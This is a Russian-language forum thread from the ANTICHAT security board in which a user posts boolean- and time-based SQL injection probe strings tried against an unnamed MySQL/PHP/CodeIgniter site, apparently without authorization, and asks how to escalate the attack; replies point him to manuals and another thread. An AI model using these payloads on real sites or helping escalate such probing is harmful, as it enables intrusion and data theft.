HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.04.2025, 12:34
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
Провел на форуме:
61136

Репутация: 32
По умолчанию

Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?
 
Ответить с цитированием

  #2  
Старый 23.04.2025, 19:45
larchik
Новичок
Регистрация: 07.06.2019
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Ну так надо крутить, чтоб понять, есть ли возможность ) Ясновидящих тут нет.
Вооружайся мануалами, шпаргалками, статьями из инета, документацией по mysql и крути.
 
Ответить с цитированием

  #3  
Старый 23.04.2025, 21:23
Местный
Новичок
Регистрация: 07.07.2023
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:

wallhack сказал(а):

Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?

На соседнем форуме есть топик "Найденные интересеные SQL inj & XSS". Там могут помочь
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.